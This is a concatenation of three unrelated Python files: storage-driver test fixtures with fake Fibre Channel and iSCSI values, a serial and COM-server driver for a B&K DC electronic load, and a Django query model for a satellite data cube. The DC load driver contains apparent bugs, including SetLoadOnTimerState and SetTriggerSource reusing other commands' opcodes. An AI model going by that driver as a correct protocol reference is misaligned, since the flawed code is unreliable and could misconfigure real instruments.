'21:00:00:24:ff:40:6c:c2']
FC_TARGET_WWPNS = ['500a098280feeba5', '500a098290feeba5',
'500a098190feeba5', '500a098180feeba5']
FC_FORMATTED_TARGET_WWPNS = ['50:0a:09:82:80:fe:eb:a5',
'50:0a:09:82:90:fe:eb:a5',
'50:0a:09:81:90:fe:eb:a5',
'50:0a:09:81:80:fe:eb:a5']
FC_CONNECTOR = {'ip': '1.1.1.1',
'host': 'fake_host',
'wwnns': ['20000024ff406cc3', '20000024ff406cc2'],
'wwpns': ['21000024ff406cc3', '21000024ff406cc2']}
FC_I_T_MAP = {'21000024ff406cc3': ['500a098280feeba5', '500a098290feeba5'],
'21000024ff406cc2': ['500a098190feeba5', '500a098180feeba5']}
FC_I_T_MAP_COMPLETE = {'21000024ff406cc3': FC_TARGET_WWPNS,
'21000024ff406cc2': FC_TARGET_WWPNS}
FC_FABRIC_MAP = {'fabricB':
{'target_port_wwn_list':
['500a098190feeba5', '500a098180feeba5'],
'initiator_port_wwn_list': ['21000024ff406cc2']},
'fabricA':
{'target_port_wwn_list':
['500a098290feeba5', '500a098280feeba5'],
'initiator_port_wwn_list': ['21000024ff406cc3']}}
FC_TARGET_INFO = {'driver_volume_type': 'fibre_channel',
'data': {'target_lun': 1,
'initiator_target_map': FC_I_T_MAP,
'access_mode': 'rw',
'target_wwn': FC_TARGET_WWPNS,
'target_discovered': True}}
FC_TARGET_INFO_EMPTY = {'driver_volume_type': 'fibre_channel', 'data': {}}
FC_TARGET_INFO_UNMAP = {'driver_volume_type': 'fibre_channel',
'data': {'target_wwn': FC_TARGET_WWPNS,
'initiator_target_map': FC_I_T_MAP}}
IGROUP1_NAME = 'openstack-igroup1'
IGROUP1 = {
'initiator-group-os-type': 'linux',
'initiator-group-type': 'fcp',
'initiator-group-name': IGROUP1_NAME,
}
ISCSI_VOLUME = {
'name': 'fake_volume',
'id': 'fake_id',
'provider_auth': 'fake provider auth',
}
ISCSI_LUN = {'name': ISCSI_VOLUME, 'lun_id': 42}
ISCSI_SERVICE_IQN = 'fake_iscsi_service_iqn'
ISCSI_CONNECTION_PROPERTIES = {
'data': {
'auth_method': 'fake',
'auth_password': 'auth',
'auth_username': 'provider',
'target_discovered': False,
'target_iqn': ISCSI_SERVICE_IQN,
'target_lun': 42,
'target_portal': '1.2.3.4:3260',
'volume_id': 'fake_id',
},
'driver_volume_type': 'iscsi',
}
ISCSI_CONNECTOR = {
'ip': '1.1.1.1',
'host': 'fake_host',
'initiator': 'fake_initiator_iqn',
}
ISCSI_TARGET_DETAILS_LIST = [
{'address': '5.6.7.8', 'port': '3260'},
{'address': '1.2.3.4', 'port': '3260'},
{'address': '99.98.97.96', 'port': '3260'},
]
IPV4_ADDRESS = '192.168.14.2'
IPV6_ADDRESS = 'fe80::6e40:8ff:fe8a:130'
NFS_SHARE_IPV4 = IPV4_ADDRESS + ':' + EXPORT_PATH
NFS_SHARE_IPV6 = IPV6_ADDRESS + ':' + EXPORT_PATH
RESERVED_PERCENTAGE = 7
TOTAL_BYTES = 4797892092432
AVAILABLE_BYTES = 13479932478
CAPACITY_VALUES = (TOTAL_BYTES, AVAILABLE_BYTES)
IGROUP1 = {'initiator-group-os-type': 'linux',
'initiator-group-type': 'fcp',
'initiator-group-name': IGROUP1_NAME}
QOS_SPECS = {}
EXTRA_SPECS = {}
MAX_THROUGHPUT = '21734278B/s'
QOS_POLICY_GROUP_NAME = 'fake_qos_policy_group_name'
QOS_POLICY_GROUP_INFO_LEGACY = {
'legacy': 'legacy-' + QOS_POLICY_GROUP_NAME,
'spec': None,
}
QOS_POLICY_GROUP_SPEC = {
'max_throughput': MAX_THROUGHPUT,
'policy_name': QOS_POLICY_GROUP_NAME,
}
QOS_POLICY_GROUP_INFO = {'legacy': None, 'spec': QOS_POLICY_GROUP_SPEC}
CLONE_SOURCE_NAME = 'fake_clone_source_name'
CLONE_SOURCE_ID = 'fake_clone_source_id'
CLONE_SOURCE_SIZE = 1024
CLONE_SOURCE = {
'size': CLONE_SOURCE_SIZE,
'name': CLONE_SOURCE_NAME,
'id': CLONE_SOURCE_ID,
}
CLONE_DESTINATION_NAME = 'fake_clone_destination_name'
CLONE_DESTINATION_SIZE = 1041
CLONE_DESTINATION_ID = 'fake_clone_destination_id'
CLONE_DESTINATION = {
'size': CLONE_DESTINATION_SIZE,
'name': CLONE_DESTINATION_NAME,
'id': CLONE_DESTINATION_ID,
}
SNAPSHOT = {
'name': 'fake_snapshot_name',
'volume_size': SIZE,
'volume_id': 'fake_volume_id',
}
VOLUME_REF = {'name': 'fake_vref_name', 'size': 42}
FILE_LIST = ['file1', 'file2', 'file3']
|
|
'''
Open Source Initiative OSI - The MIT License:Licensing
Tue, 2006-10-31 04:56 - nelson
The MIT License
Copyright (c) 2009 BK Precision
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
This python module provides a functional interface to a B&K DC load
through the DCLoad object. This object can also be used as a COM
server by running this module as a script to register it. All the
DCLoad object methods return strings. All units into and out of the
DCLoad object's methods are in SI units.
See the documentation file that came with this script.
$RCSfile: dcload.py $
$Revision: 1.0 $
$Date: 2008/05/17 15:57:15 $
$Author: Don Peterson $
'''
from __future__ import division
import sys, time, serial
from string import join
try:
from win32com.server.exception import COMException
except:
pass
# Debugging information is set to stdout by default. You can change
# the out variable to another method to e.g. write to a different
# stream.
out = sys.stdout.write
nl = "\n"
class InstrumentException(Exception): pass
class InstrumentInterface:
'''Provides the interface to a 26 byte instrument along with utility
functions.
'''
debug = 0 # Set to 1 to see dumps of commands and responses
length_packet = 26 # Number of bytes in a packet
convert_current = 1e4 # Convert current in A to 0.1 mA
convert_voltage = 1e3 # Convert voltage in V to mV
convert_power = 1e3 # Convert power in W to mW
convert_resistance = 1e3 # Convert resistance in ohm to mohm
to_ms = 1000 # Converts seconds to ms
# Number of settings storage registers
lowest_register = 1
highest_register = 25
# Values for setting modes of CC, CV, CW, or CR
modes = {"cc":0, "cv":1, "cw":2, "cr":3}
def Initialize(self, com_port, baudrate, address=0):
self.sp = serial.Serial(com_port, baudrate)
self.address = address
def DumpCommand(self, bytes):
'''Print out the contents of a 26 byte command. Example:
aa .. 20 01 .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. cb
'''
assert(len(bytes) == self.length_packet)
header = " "*3
out(header)
for i in xrange(self.length_packet):
if i % 10 == 0 and i != 0:
out(nl + header)
if i % 5 == 0:
out(" ")
s = "%02x" % ord(bytes[i])
if s == "00":
# Use the decimal point character if you see an
# unattractive printout on your machine.
#s = "."*2
# The following alternate character looks nicer
# in a console window on Windows.
s = chr(250)*2
out(s)
out(nl)
def CommandProperlyFormed(self, cmd):
'''Return 1 if a command is properly formed; otherwise, return 0.
'''
commands = (
0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29,
0x2A, 0x2B, 0x2C, 0x2D, 0x2E, 0x2F, 0x30, 0x31, 0x32, 0x33,
0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3A, 0x3B, 0x3C, 0x3D,
0x3E, 0x3F, 0x40, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47,
0x48, 0x49, 0x4A, 0x4B, 0x4C, 0x4D, 0x4E, 0x4F, 0x50, 0x51,
0x52, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58, 0x59, 0x5A, 0x5B,
0x5C, 0x5D, 0x5E, 0x5F, 0x60, 0x61, 0x62, 0x63, 0x64, 0x65,
0x66, 0x67, 0x68, 0x69, 0x6A, 0x6B, 0x6C, 0x12
)
# Must be proper length
if len(cmd) != self.length_packet:
out("Command length = " + str(len(cmd)) + "-- should be " + \
str(self.length_packet) + nl)
return 0
# First character must be 0xaa
if ord(cmd[0]) != 0xaa:
out("First byte should be 0xaa" + nl)
return 0
# Second character (address) must not be 0xff
if ord(cmd[1]) == 0xff:
out("Second byte cannot be 0xff" + nl)
return 0
# Third character must be valid command
byte3 = "%02X" % ord(cmd[2])
if ord(cmd[2]) not in commands:
out("Third byte not a valid command: %s\n" % byte3)
return 0
# Calculate checksum and validate it
checksum = self.CalculateChecksum(cmd)
if checksum != ord(cmd[-1]):
out("Incorrect checksum" + nl)
return 0
return 1
def CalculateChecksum(self, cmd):
'''Return the sum of the bytes in cmd modulo 256.
'''
assert((len(cmd) == self.length_packet - 1) or (len(cmd) == self.length_packet))
checksum = 0
for i in xrange(self.length_packet - 1):
checksum += ord(cmd[i])
checksum %= 256
return checksum
def StartCommand(self, byte):
return chr(0xaa) + chr(self.address) + chr(byte)
def SendCommand(self, command):
'''Sends the command to the serial stream and returns the 26 byte
response.
'''
assert(len(command) == self.length_packet)
self.sp.write(command)
response = self.sp.read(self.length_packet)
assert(len(response) == self.length_packet)
return response
def ResponseStatus(self, response):
'''Return a message string about what the response meant. The
empty string means the response was OK.
'''
responses = {
0x90 : "Wrong checksum",
0xA0 : "Incorrect parameter value",
0xB0 : "Command cannot be carried out",
0xC0 : "Invalid command",
0x80 : "",
}
assert(len(response) == self.length_packet)
assert(ord(response[2]) == 0x12)
return responses[ord(response[3])]
def CodeInteger(self, value, num_bytes=4):
'''Construct a little endian string for the indicated value. Two
and 4 byte integers are the only ones allowed.
'''
assert(num_bytes == 1 or num_bytes == 2 or num_bytes == 4)
value = int(value) # Make sure it's an integer
s = chr(value & 0xff)
if num_bytes >= 2:
s += chr((value & (0xff << 8)) >> 8)
if num_bytes == 4:
s += chr((value & (0xff << 16)) >> 16)
s += chr((value & (0xff << 24)) >> 24)
assert(len(s) == 4)
return s
def DecodeInteger(self, str):
'''Construct an integer from the little endian string. 1, 2, and 4 byte
strings are the only ones allowed.
'''
assert(len(str) == 1 or len(str) == 2 or len(str) == 4)
n = ord(str[0])
if len(str) >= 2:
n += (ord(str[1]) << 8)
if len(str) == 4:
n += (ord(str[2]) << 16)
n += (ord(str[3]) << 24)
return n
def GetReserved(self, num_used):
'''Construct a string of nul characters of such length to pad a
command to one less than the packet size (leaves room for the
checksum byte.
'''
num = self.length_packet - num_used - 1
assert(num > 0)
return chr(0)*num
def PrintCommandAndResponse(self, cmd, response, cmd_name):
'''Print the command and its response if debugging is on.
'''
assert(cmd_name)
if self.debug:
out(cmd_name + " command:" + nl)
self.DumpCommand(cmd)
out(cmd_name + " response:" + nl)
self.DumpCommand(response)
def GetCommand(self, command, value, num_bytes=4):
'''Construct the command with an integer value of 0, 1, 2, or
4 bytes.
'''
cmd = self.StartCommand(command)
if num_bytes > 0:
r = num_bytes + 3
cmd += self.CodeInteger(value)[:num_bytes] + self.Reserved(r)
else:
cmd += self.Reserved(0)
cmd += chr(self.CalculateChecksum(cmd))
assert(self.CommandProperlyFormed(cmd))
return cmd
def GetData(self, data, num_bytes=4):
'''Extract the little endian integer from the data and return it.
'''
assert(len(data) == self.length_packet)
if num_bytes == 1:
return ord(data[3])
elif num_bytes == 2:
return self.DecodeInteger(data[3:5])
elif num_bytes == 4:
return self.DecodeInteger(data[3:7])
else:
raise Exception("Bad number of bytes: %d" % num_bytes)
def Reserved(self, num_used):
assert(num_used >= 3 and num_used < self.length_packet - 1)
return chr(0)*(self.length_packet - num_used - 1)
def SendIntegerToLoad(self, byte, value, msg, num_bytes=4):
'''Send the indicated command along with value encoded as an integer
of the specified size. Return the instrument's response status.
'''
cmd = self.GetCommand(byte, value, num_bytes)
response = self.SendCommand(cmd)
self.PrintCommandAndResponse(cmd, response, msg)
return self.ResponseStatus(response)
def GetIntegerFromLoad(self, cmd_byte, msg, num_bytes=4):
'''Construct a command from the byte in cmd_byte, send it, get
the response, then decode the response into an integer with the
number of bytes in num_bytes. msg is the debugging string for
the printout. Return the integer.
'''
assert(num_bytes == 1 or num_bytes == 2 or num_bytes == 4)
cmd = self.StartCommand(cmd_byte)
cmd += self.Reserved(3)
cmd += chr(self.CalculateChecksum(cmd))
assert(self.CommandProperlyFormed(cmd))
response = self.SendCommand(cmd)
self.PrintCommandAndResponse(cmd, response, msg)
return self.DecodeInteger(response[3:3 + num_bytes])
class DCLoad(InstrumentInterface):
_reg_clsid_ = "{943E2FA3-4ECE-448A-93AF-9ECAEB49CA1B}"
_reg_desc_ = "B&K DC Load COM Server"
_reg_progid_ = "BKServers.DCLoad85xx" # External name
_public_attrs_ = ["debug"]
_public_methods_ = [
"DisableLocalControl",
"EnableLocalControl",
"GetBatteryTestVoltage",
"GetCCCurrent",
"GetCRResistance",
"GetCVVoltage",
"GetCWPower",
"GetFunction",
"GetInputValues",
"GetLoadOnTimer",
"GetLoadOnTimerState",
"GetMaxCurrent",
"GetMaxPower",
"GetMaxVoltage",
"GetMode",
"GetProductInformation",
"GetRemoteSense",
"GetTransient",
"GetTriggerSource",
"Initialize",
"RecallSettings",
"SaveSettings",
"SetBatteryTestVoltage",
"SetCCCurrent",
"SetCRResistance",
"SetCVVoltage",
"SetCWPower",
"SetCommunicationAddress",
"SetFunction",
"SetLoadOnTimer",
"SetLoadOnTimerState",
"SetLocalControl",
"SetMaxCurrent",
"SetMaxPower",
"SetMaxVoltage",
"SetMode",
"SetRemoteControl",
"SetRemoteSense",
"SetTransient",
"SetTriggerSource",
"TimeNow",
"TriggerLoad",
"TurnLoadOff",
"TurnLoadOn",
]
def Initialize(self, com_port, baudrate, address=0):
"Initialize the base class"
InstrumentInterface.Initialize(self, com_port, baudrate, address)
def TimeNow(self):
"Returns a string containing the current time"
return time.asctime()
def TurnLoadOn(self):
"Turns the load on"
msg = "Turn load on"
on = 1
return self.SendIntegerToLoad(0x21, on, msg, num_bytes=1)
def TurnLoadOff(self):
"Turns the load off"
msg = "Turn load off"
off = 0
return self.SendIntegerToLoad(0x21, off, msg, num_bytes=1)
def SetRemoteControl(self):
"Sets the load to remote control"
msg = "Set remote control"
remote = 1
return self.SendIntegerToLoad(0x20, remote, msg, num_bytes=1)
def SetLocalControl(self):
"Sets the load to local control"
msg = "Set local control"
local = 0
return self.SendIntegerToLoad(0x20, local, msg, num_bytes=1)
def SetMaxCurrent(self, current):
"Sets the maximum current the load will sink"
msg = "Set max current"
return self.SendIntegerToLoad(0x24, current*self.convert_current, msg, num_bytes=4)
def GetMaxCurrent(self):
"Returns the maximum current the load will sink"
msg = "Set max current"
return self.GetIntegerFromLoad(0x25, msg, num_bytes=4)/self.convert_current
def SetMaxVoltage(self, voltage):
"Sets the maximum voltage the load will allow"
msg = "Set max voltage"
return self.SendIntegerToLoad(0x22, voltage*self.convert_voltage, msg, num_bytes=4)
def GetMaxVoltage(self):
"Gets the maximum voltage the load will allow"
msg = "Get max voltage"
return self.GetIntegerFromLoad(0x23, msg, num_bytes=4)/self.convert_voltage
def SetMaxPower(self, power):
"Sets the maximum power the load will allow"
msg = "Set max power"
return self.SendIntegerToLoad(0x26, power*self.convert_power, msg, num_bytes=4)
def GetMaxPower(self):
"Gets the maximum power the load will allow"
msg = "Get max power"
return self.GetIntegerFromLoad(0x27, msg, num_bytes=4)/self.convert_power
def SetMode(self, mode):
"Sets the mode (constant current, constant voltage, etc."
if mode.lower() not in self.modes:
raise Exception("Unknown mode")
msg = "Set mode"
return self.SendIntegerToLoad(0x28, self.modes[mode.lower()], msg, num_bytes=1)
def GetMode(self):
"Gets the mode (constant current, constant voltage, etc."
msg = "Get mode"
mode = self.GetIntegerFromLoad(0x29, msg, num_bytes=1)
modes_inv = {0:"cc", 1:"cv", 2:"cw", 3:"cr"}
return modes_inv[mode]
def SetCCCurrent(self, current):
"Sets the constant current mode's current level"
msg = "Set CC current"
return self.SendIntegerToLoad(0x2A, current*self.convert_current, msg, num_bytes=4)
def GetCCCurrent(self):
"Gets the constant current mode's current level"
msg = "Get CC current"
return self.GetIntegerFromLoad(0x2B, msg, num_bytes=4)/self.convert_current
def SetCVVoltage(self, voltage):
"Sets the constant voltage mode's voltage level"
msg = "Set CV voltage"
return self.SendIntegerToLoad(0x2C, voltage*self.convert_voltage, msg, num_bytes=4)
def GetCVVoltage(self):
"Gets the constant voltage mode's voltage level"
msg = "Get CV voltage"
return self.GetIntegerFromLoad(0x2D, msg, num_bytes=4)/self.convert_voltage
def SetCWPower(self, power):
"Sets the constant power mode's power level"
msg = "Set CW power"
return self.SendIntegerToLoad(0x2E, power*self.convert_power, msg, num_bytes=4)
def GetCWPower(self):
"Gets the constant power mode's power level"
msg = "Get CW power"
return self.GetIntegerFromLoad(0x2F, msg, num_bytes=4)/self.convert_power
def SetCRResistance(self, resistance):
"Sets the constant resistance mode's resistance level"
msg = "Set CR resistance"
return self.SendIntegerToLoad(0x30, resistance*self.convert_resistance, msg, num_bytes=4)
def GetCRResistance(self):
"Gets the constant resistance mode's resistance level"
msg = "Get CR resistance"
return self.GetIntegerFromLoad(0x31, msg, num_bytes=4)/self.convert_resistance
def SetTransient(self, mode, A, A_time_s, B, B_time_s, operation="continuous"):
'''Sets up the transient operation mode. mode is one of
"CC", "CV", "CW", or "CR".
'''
if mode.lower() not in self.modes:
raise Exception("Unknown mode")
opcodes = {"cc":0x32, "cv":0x34, "cw":0x36, "cr":0x38}
if mode.lower() == "cc":
const = self.convert_current
elif mode.lower() == "cv":
const = self.convert_voltage
elif mode.lower() == "cw":
const = self.convert_power
else:
const = self.convert_resistance
cmd = self.StartCommand(opcodes[mode.lower()])
cmd += self.CodeInteger(A*const, num_bytes=4)
cmd += self.CodeInteger(A_time_s*self.to_ms, num_bytes=2)
cmd += self.CodeInteger(B*const, num_bytes=4)
cmd += self.CodeInteger(B_time_s*self.to_ms, num_bytes=2)
transient_operations = {"continuous":0, "pulse":1, "toggled":2}
cmd += self.CodeInteger(transient_operations[operation], num_bytes=1)
cmd += self.Reserved(16)
cmd += chr(self.CalculateChecksum(cmd))
assert(self.CommandProperlyFormed(cmd))
response = self.SendCommand(cmd)
self.PrintCommandAndResponse(cmd, response, "Set %s transient" % mode)
return self.ResponseStatus(response)
def GetTransient(self, mode):
"Gets the transient mode settings"
if mode.lower() not in self.modes:
raise Exception("Unknown mode")
opcodes = {"cc":0x33, "cv":0x35, "cw":0x37, "cr":0x39}
cmd = self.StartCommand(opcodes[mode.lower()])
cmd += self.Reserved(3)
cmd += chr(self.CalculateChecksum(cmd))
assert(self.CommandProperlyFormed(cmd))
response = self.SendCommand(cmd)
self.PrintCommandAndResponse(cmd, response, "Get %s transient" % mode)
A = self.DecodeInteger(response[3:7])
A_timer_ms = self.DecodeInteger(response[7:9])
B = self.DecodeInteger(response[9:13])
B_timer_ms = self.DecodeInteger(response[13:15])
operation = self.DecodeInteger(response[15])
time_const = 1e3
transient_operations_inv = {0:"continuous", 1:"pulse", 2:"toggled"}
if mode.lower() == "cc":
return str((A/self.convert_current, A_timer_ms/time_const,
B/self.convert_current, B_timer_ms/time_const,
transient_operations_inv[operation]))
elif mode.lower() == "cv":
return str((A/self.convert_voltage, A_timer_ms/time_const,
B/self.convert_voltage, B_timer_ms/time_const,
transient_operations_inv[operation]))
elif mode.lower() == "cw":
return str((A/self.convert_power, A_timer_ms/time_const,
B/self.convert_power, B_timer_ms/time_const,
transient_operations_inv[operation]))
else:
return str((A/self.convert_resistance, A_timer_ms/time_const,
B/self.convert_resistance, B_timer_ms/time_const,
transient_operations_inv[operation]))
def SetBatteryTestVoltage(self, min_voltage):
"Sets the battery test voltage"
msg = "Set battery test voltage"
return self.SendIntegerToLoad(0x4E, min_voltage*self.convert_voltage, msg, num_bytes=4)
def GetBatteryTestVoltage(self):
"Gets the battery test voltage"
msg = "Get battery test voltage"
return self.GetIntegerFromLoad(0x4F, msg, num_bytes=4)/self.convert_voltage
def SetLoadOnTimer(self, time_in_s):
"Sets the time in seconds that the load will be on"
msg = "Set load on timer"
return self.SendIntegerToLoad(0x50, time_in_s, msg, num_bytes=2)
def GetLoadOnTimer(self):
"Gets the time in seconds that the load will be on"
msg = "Get load on timer"
return self.GetIntegerFromLoad(0x51, msg, num_bytes=2)
def SetLoadOnTimerState(self, enabled=0):
"Enables or disables the load on timer state"
msg = "Set load on timer state"
return self.SendIntegerToLoad(0x50, enabled, msg, num_bytes=1)
def GetLoadOnTimerState(self):
"Gets the load on timer state"
msg = "Get load on timer"
state = self.GetIntegerFromLoad(0x53, msg, num_bytes=1)
if state == 0:
return "disabled"
else:
return "enabled"
def SetCommunicationAddress(self, address=0):
'''Sets the communication address. Note: this feature is
not currently supported. The communication address should always
be set to 0.
'''
msg = "Set communication address"
return self.SendIntegerToLoad(0x54, address, msg, num_bytes=1)
def EnableLocalControl(self):
"Enable local control (i.e., key presses work) of the load"
msg = "Enable local control"
enabled = 1
return self.SendIntegerToLoad(0x55, enabled, msg, num_bytes=1)
def DisableLocalControl(self):
"Disable local control of the load"
msg = "Disable local control"
disabled = 0
return self.SendIntegerToLoad(0x55, disabled, msg, num_bytes=1)
def SetRemoteSense(self, enabled=0):
"Enable or disable remote sensing"
msg = "Set remote sense"
return self.SendIntegerToLoad(0x56, enabled, msg, num_bytes=1)
def GetRemoteSense(self):
"Get the state of remote sensing"
msg = "Get remote sense"
return self.GetIntegerFromLoad(0x57, msg, num_bytes=1)
def SetTriggerSource(self, source="immediate"):
'''Set how the instrument will be triggered.
"immediate" means triggered from the front panel.
"external" means triggered by a TTL signal on the rear panel.
"bus" means a software trigger (see TriggerLoad()).
'''
trigger = {"immediate":0, "external":1, "bus":2}
if source not in trigger:
raise Exception("Trigger type %s not recognized" % source)
msg = "Set trigger type"
return self.SendIntegerToLoad(0x54, trigger[source], msg, num_bytes=1)
def GetTriggerSource(self):
"Get how the instrument will be triggered"
msg = "Get trigger source"
t = self.GetIntegerFromLoad(0x59, msg, num_bytes=1)
trigger_inv = {0:"immediate", 1:"external", 2:"bus"}
return trigger_inv[t]
def TriggerLoad(self):
'''Provide a software trigger. This is only of use when the trigger
mode is set to "bus".
'''
cmd = self.StartCommand(0x5A)
cmd += self.Reserved(3)
cmd += chr(self.CalculateChecksum(cmd))
assert(self.CommandProperlyFormed(cmd))
response = self.SendCommand(cmd)
self.PrintCommandAndResponse(cmd, response, "Trigger load (trigger = bus)")
return self.ResponseStatus(response)
def SaveSettings(self, register=0):
"Save instrument settings to a register"
assert(self.lowest_register <= register <= self.highest_register)
msg = "Save to register %d" % register
return self.SendIntegerToLoad(0x5B, register, msg, num_bytes=1)
def RecallSettings(self, register=0):
"Restore instrument settings from a register"
assert(self.lowest_register <= register <= self.highest_register)
cmd = self.GetCommand(0x5C, register, num_bytes=1)
response = self.SendCommand(cmd)
self.PrintCommandAndResponse(cmd, response, "Recall register %d" % register)
return self.ResponseStatus(response)
def SetFunction(self, function="fixed"):
'''Set the function (type of operation) of the load.
function is one of "fixed", "short", "transient", or "battery".
Note "list" is intentionally left out for now.
'''
msg = "Set function to %s" % function
functions = {"fixed":0, "short":1, "transient":2, "battery":4}
return self.SendIntegerToLoad(0x5D, functions[function], msg, num_bytes=1)
def GetFunction(self):
"Get the function (type of operation) of the load"
msg = "Get function"
fn = self.GetIntegerFromLoad(0x5E, msg, num_bytes=1)
functions_inv = {0:"fixed", 1:"short", 2:"transient", 4:"battery"}
return functions_inv[fn]
def GetInputValues(self):
'''Returns voltage in V, current in A, and power in W, op_state byte,
and demand_state byte.
'''
cmd = self.StartCommand(0x5F)
cmd += self.Reserved(3)
cmd += chr(self.CalculateChecksum(cmd))
assert(self.CommandProperlyFormed(cmd))
response = self.SendCommand(cmd)
self.PrintCommandAndResponse(cmd, response, "Get input values")
voltage = self.DecodeInteger(response[3:7])/self.convert_voltage
current = self.DecodeInteger(response[7:11])/self.convert_current
power = self.DecodeInteger(response[11:15])/self.convert_power
op_state = hex(self.DecodeInteger(response[15]))
demand_state = hex(self.DecodeInteger(response[16:18]))
s = [str(voltage) + " V", str(current) + " A", str(power) + " W", str(op_state), str(demand_state)]
return join(s, "\t")
# Returns model number, serial number, and firmware version number
def GetProductInformation(self):
"Returns model number, serial number, and firmware version"
cmd = self.StartCommand(0x6A)
cmd += self.Reserved(3)
cmd += chr(self.CalculateChecksum(cmd))
assert(self.CommandProperlyFormed(cmd))
response = self.SendCommand(cmd)
self.PrintCommandAndResponse(cmd, response, "Get product info")
model = response[3:8]
fw = hex(ord(response[9]))[2:] + "."
fw += hex(ord(response[8]))[2:]
serial_number = response[10:20]
return join((str(model), str(serial_number), str(fw)), "\t")
def ClosePort(self):
self.sp.close()
def Register(pyclass=DCLoad):
from win32com.server.register import UseCommandLine
UseCommandLine(pyclass)
def Unregister(classid=DCLoad._reg_clsid_):
from win32com.server.register import UnregisterServer
UnregisterServer(classid)
# Run this script to register the COM server. Use the command line
# argument --unregister to unregister the server.
if __name__ == '__main__':
Register()
|
|
# Copyright 2016 United States Government as represented by the Administrator
# of the National Aeronautics and Space Administration. All Rights Reserved.
#
# Portion of this code is Copyright Geoscience Australia, Licensed under the
# Apache License, Version 2.0 (the "License"); you may not use this file
# except in compliance with the License. You may obtain a copy of the License
# at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# The CEOS 2 platform is licensed under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.db import models
from django.core.exceptions import ValidationError
from django.conf import settings
import datetime
from django.utils import timezone
import pytz
import uuid
import os
class Query(models.Model):
"""Base Query model meant to be inherited by a TaskClass
Serves as the base of all algorithm query, containing some basic metadata
such as title, description, and self timing functionality.
Additionally, basic time, latitude, and longitude ranges are provided
along with platform/product used for querying the Data Cube.
Constraints:
All fields excluding primary key are unique together.
No fields are optional - defaults are provided only in specific fields
Usage:
In each app, subclass Query and add all fields (if desired).
Subclass Meta and add the newly added fields (if any) to the list of
unique_together fields in the meta class. e.g.
class AppQuery(Query):
sample_field = models.CharField(max_length=100)
class Meta(Query.Meta):
unique_together = (('satellite', 'area_id', 'product', 'time_start', 'time_end', 'latitude_max', 'latitude_min',
'longitude_max', 'longitude_min', 'sample_field'))
"""
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=True)
title = models.CharField(max_length=100)
description = models.CharField(max_length=10000)
execution_start = models.DateTimeField('execution_start', default=timezone.now)#datetime.datetime.now)
execution_end = models.DateTimeField('execution_end', default=timezone.now)#datetime.datetime.now)
area_id = models.CharField(max_length=100)
satellite = models.ForeignKey('dc_algorithm.Satellite')
time_start = models.DateField('time_start')
time_end = models.DateField('time_end')
latitude_min = models.FloatField()
latitude_max = models.FloatField()
longitude_min = models.FloatField()
longitude_max = models.FloatField()
pixel_drill_task = models.BooleanField(default=False)
#false by default, only change is false-> true
complete = models.BooleanField(default=False)
config_path = '/app/config/datacube.conf'
class Meta:
abstract = True
unique_together = (('satellite', 'area_id', 'time_start', 'time_end', 'latitude_max', 'latitude_min',
'longitude_max', 'longitude_min', 'title', 'description'))
def __str__(self):
return str(self.pk)
def get_unique_fields_as_list(self):
return [getattr(self, field) for field in self._meta.unique_together[0]]
def update_status(self, status, message):
self.status = status
self.message = message
self.save()
def get_temp_path(self):
"""Gets a temp path for the task created by concatenating the base_result_dir, temp, and the pk."""
if not self.base_result_dir:
raise NotImplementedError("You must define 'base_result_dir' in the inheriting class.")
temp_dir = os.path.join(self.base_result_dir, 'temp', str(self.pk))
try:
os.makedirs(temp_dir)
except OSError:
pass
return temp_dir
def get_result_path(self):
"""Get the result directory for the task from base_result_dir and the pk"""
if not self.base_result_dir:
raise NotImplementedError("You must define 'base_result_dir' in the inheriting class.")
result_dir = os.path.join(self.base_result_dir, str(self.pk))
try:
os.makedirs(result_dir)
except OSError:
pass
return result_dir
def update_bounds_from_dataset(self, dataset):
self.latitude_min = min(dataset.latitude)
self.latitude_max = max(dataset.latitude)
self.longitude_min = min(dataset.longitude)
self.longitude_max = max(dataset.longitude)
self.save()
def get_chunk_size(self):
"""gets the required geographic and time chunk sizes
if there should not be chunking in a dimension, return None as the chunk size.
Geographic is in terms of degrees, time in terms of acquisitions.
Returns:
Dict containing {'geographic': float, 'time': integer}
"""
"""if not self.compositor.is_iterative():
return {'time': None, 'geographic': 0.005}
return {'time': 25, 'geographic': 0.5}"""
raise NotImplementedError("You must define 'get_reverse_time' in the inheriting class.")
def get_iterative(self):
"""defines whether or not this algorithm is iterative
If the entire set of data ove rthe time dimension is required, return false hre.
Returns:
Boolean signifying if time should be chunked or not.
"""
#return self.compositor.id != "median_pixel"
raise NotImplementedError("You must define 'get_reverse_time' in the inheriting class.")
def get_reverse_time(self):
"""Defines whether this task is processed in reverse time order or not.
If we want scenes processed from most recent first, this will return true (e.g. most recent pixel mosaics)
else false.
Returns:
Boolean signifying whether time chunks should be processed most recent first or least recent first.
"""
#return self.compositor.id == "most_recent"
